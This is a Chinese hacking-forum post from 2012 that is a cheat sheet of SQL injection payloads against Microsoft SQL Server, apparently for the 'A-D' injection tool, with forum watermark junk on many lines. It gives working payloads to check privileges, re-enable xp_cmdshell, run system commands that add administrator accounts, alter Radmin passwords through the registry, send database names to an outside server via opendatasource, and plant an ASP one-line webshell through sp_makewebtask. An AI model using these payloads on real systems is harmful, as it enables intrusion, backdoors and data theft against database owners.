找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1955|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令) ?* a2 Y7 v; N* E3 d
//看看是什么权限的
5 A. w/ I$ |( k1 S% hand 1=(Select IS_MEMBER('db_owner'))
* b) r: O$ h1 w% |And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--1 s% U* N$ d) {; s5 P  q

/ W6 P8 I+ {9 T7 e//检测是否有读取某数据库的权限* S, S* i; [- @. Q9 e9 O2 e
and 1= (Select HAS_DBACCESS('master'))  R/ G/ u. b- ~5 a0 D: X
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
8 o" r& n" D2 V9 w5 ~" ?- F+ H
% U8 {5 x" _8 u  f
: X& N- x$ G% v数字类型
: w2 e9 T) A5 Iand char(124)%2Buser%2Bchar(124)=0# J+ q1 S% c3 g2 n: j

0 P+ @6 y; S) S( h' h" S3 H$ Z字符类型
5 Q8 Z' `4 J1 J: h3 ^' V% N0 Q' and char(124)%2Buser%2Bchar(124)=0 and ''='
. }8 y) _, ~  v3 }8 f
7 d6 Q" G7 d4 q* {搜索类型8 u+ F  q: w' `( n/ B0 b
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
4 n. Y2 _* {, `+ v0 g' Q5 J1 @" r* ~6 U$ q, |: {( b3 H
爆用户名9 p6 Z: T- L+ n% j
and user>0
% P$ y/ O/ A; @; [8 `5 ]) X+ R6 ]- Y' and user>0 and ''=') r8 B' I3 y* |/ d2 J7 u
" U! y. t% g* [* S: m9 O) }! G
检测是否为SA权限) c1 _& T! i7 A
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--( {; @" z: Z: ]) H
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
9 @  g9 u+ S  U, S, _  \5 s1 t6 S0 i6 B) V) ]6 l
检测是不是MSSQL数据库1 p" J7 O  {" O( b; [4 b& n' ~
and exists (select * from sysobjects);-- + ^% o& g& f0 C% N0 c4 F* {
# V6 x: b9 v; _& h2 L' s
检测是否支持多行7 h3 p1 x" r3 x+ H) F
;declare @d int;--
" O, Q9 T* \+ ^& Q9 x. `$ @! @" ^& R; D
恢复 xp_cmdshell6 o/ i* E( A: R# `& z
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
% m" f" l! T) C5 |
& c5 O. R+ q5 A* [1 g) Z. L
; x9 ^" P: H0 ]select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 7 g& g& q  q4 E5 y6 X

0 P7 p5 q1 f" H//-----------------------( N7 D/ b- @7 l" O7 j) Y
//      执行命令
, F/ R: f, ?! {  m//-----------------------  d: f6 r% x, f! K+ p
首先开启沙盘模式:; o) T( F: m# e0 @
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',10 w/ G9 I) F; A- \
" g) J9 I* Z9 a" n; h) `' }# E
然后利用jet.oledb执行系统命令
9 p9 Y% F/ `1 fselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ ?+ L% m; b3 k: \  Z4 @6 I4 O5 j4 [
执行命令
$ P) x, M! R% w0 ^- Z;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--4 [* D; I: J/ H. D

8 X% o$ D+ o- A  J# ^EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
* Y  Q- |9 L% c, L* _, m6 o# @& ~9 x: q- Z; r- S/ ?6 s
判断xp_cmdshell扩展存储过程是否存在:+ c; X0 {/ _4 O. i
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
- o: g3 I  [- X3 P6 [8 K
# P. ^* O( ~/ @6 v' L" _写注册表2 }5 [+ Y; C% z- p) K* o) B( R+ s
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1/ ~3 F- V' o9 }
; G' d/ q/ R0 k9 N5 ^" J2 }9 K
REG_SZ
# o, k0 q  q. e! M6 @  q7 F3 {5 z
读注册表$ o. U- B3 a# K( \3 l5 B
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'2 D" M! B% D- N" B& k7 s- `1 \

' q& v3 ^5 ]0 h# F0 ]读取目录内容4 r* }- n. t( R! Z
exec master..xp_dirtree 'c:\winnt\system32\',1,11 {9 |( @% e) y/ s1 t! e3 X

# o( M1 a+ s8 s- y: B; d$ V; _% p; ~3 u$ ?6 x2 ~- F( z
数据库备份
; q# v/ [% j# P8 i/ j2 Vbackup database pubs to disk = 'c:\123.bak'; J' ^+ s; j4 f' Z  G( p
7 L* {+ S. }6 W7 a- ?4 g8 l
//爆出长度$ b1 s( x. w. a& ]' Q& Z! i
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& N) s3 ]% q( b9 r
: H/ `+ F: b$ o- L& U3 g4 d2 g" R7 R5 u- b5 h8 I

$ i+ q7 p- F9 i3 ]' U更改sa口令方法:用sql综合利用工具连接后,执行命令:
: ^1 Q) M6 c& W. Vexec sp_password NULL,'新密码','sa'
" j- Z3 M' Y1 x: l0 `* O  Y1 P+ x. l7 U2 n0 n( e8 f5 B0 ~$ b5 H
添加和删除一个SA权限的用户test:- v& M3 t& r. Z
exec master.dbo.sp_addlogin test,ptlove. C+ P! N! i% o% l& S0 u5 o
exec master.dbo.sp_addsrvrolemember test,sysadmin# l& P. _8 r8 u; u7 a& A

5 n3 R. h- w, W& }0 q# y6 ^删除扩展存储过过程xp_cmdshell的语句: 8 w( M" @7 K7 [2 ^
exec sp_dropextendedproc 'xp_cmdshell'# e) e. x8 h0 M

8 b+ H" x; [1 d2 h! s- @* c9 |添加扩展存储过过程
8 P; X% b4 v: x' b+ T6 n" ?EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
$ H7 v3 ~  k% }GRANT exec On xp_proxiedadata TO public & `# f! M8 l, G8 q3 m
. X, k) v6 G8 j' Y8 d

0 v; L2 X2 m5 `# w# `停掉或激活某个服务。
' a" Z* N) W" z+ h" V2 J6 I
" }* Q4 a2 P0 Y) w% c; ]exec master..xp_servicecontrol 'stop','schedule': I8 b3 x0 a, F8 {& s
exec master..xp_servicecontrol 'start','schedule'0 Z; h# I' y7 O$ C$ g& F" L
; ?/ ]* c# \4 _. ], h8 O$ s
dbo.xp_subdirs
  x* b2 N7 C9 r! n- P
% |3 V; d3 F/ Y* t5 o" v只列某个目录下的子目录。
. d4 [4 N- V. ~$ k% t$ N/ {xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 n, J# k3 Z0 I( @( a1 V5 R1 ~
) e9 }  O) e& W+ [& w$ P5 l7 p( |dbo.xp_makecab
% O& s: M2 {: E! g; ^* J- k* P2 g8 Z" B3 W4 `4 k  e
将目标多个档案压缩到某个目标档案之内。
7 S0 k/ F' p, [8 p4 f; O4 a, Y所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。! I( D* {7 B" g

  m% h8 f2 a  Gdbo.xp_makecab& `" o+ `: R: e% o* H; M. ~
'c:\test.cab','mszip',1,
; k( i, G5 l* R9 [2 l'C:\Inetpub\wwwroot\SQLInject\login.asp',9 k3 x5 a) w4 K3 y' q& o$ K8 S
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'" r( i# r7 L5 c* p
: v9 _  o$ u8 v* @5 b: G* `
xp_terminate_process& q( E0 |: R0 v- \

( B, f+ C; ]' `% @6 b停掉某个执行中的程序,但赋予的参数是 Process ID。
8 }5 z( V+ X" Z2 i& z利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID' v* O, ], X( M% Z" `
% h2 ~- O& n4 [# T9 e) H
xp_terminate_process 2484
9 Z7 }3 M  @3 P- z& N# k# a" \& x) M4 ?/ o2 U
xp_unpackcab
& @+ N4 o3 l) Z: Y
. |" s0 `$ N" M; Y7 x& @2 t2 ]7 ~解开压缩档。
: @7 \, m" Y' P* m( m9 ?; }) X: t8 r! {* e' ]5 t/ l
xp_unpackcab 'c:\test.cab','c:\temp',1
6 d1 F1 g3 `  T6 O% e( ?' }2 f" T6 V% U
% i& x7 Z# A7 W1 b' {
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234+ j1 u2 W& C6 O, [) i& t% ]
' R% O9 J1 u* Q0 g  k
create database lcx;
3 T0 \+ O$ x7 K5 GCreate TABLE ku(name nvarchar(256) null);
, n; R4 S1 h) x: m0 uCreate TABLE biao(id int NULL,name nvarchar(256) null);
/ _/ b, c. N$ K2 @
$ |$ \( y, f; a! I0 y//得到数据库名8 O' G2 h; V# ~. u9 d; l, A
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases8 t0 K3 {- r3 @* e

+ K; e% t; F9 }$ I( j; g
+ X% {$ \" B' B! p8 i4 K//在Master中创建表,看看权限怎样
7 N8 }5 |2 e( NCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
6 S4 Y2 C( i! K. E) R5 c
8 x) s0 D, N5 g9 y- S1 O/ C用 sp_makewebtask直接在web目录里写入一句话马:( G: u* z8 P8 n' ~" V" \( _
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--0 C+ `" p1 N) q; J3 Z) U

; ]. q9 A, B/ x//更新表内容
7 u# {. r7 u) j$ y- gUpdate films SET kind = 'Dramatic' Where id = 123
7 m$ N3 }6 x) d0 V; T) c6 ?
. C  y( W: {  N//删除内容. j- I# N- q0 r+ D
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表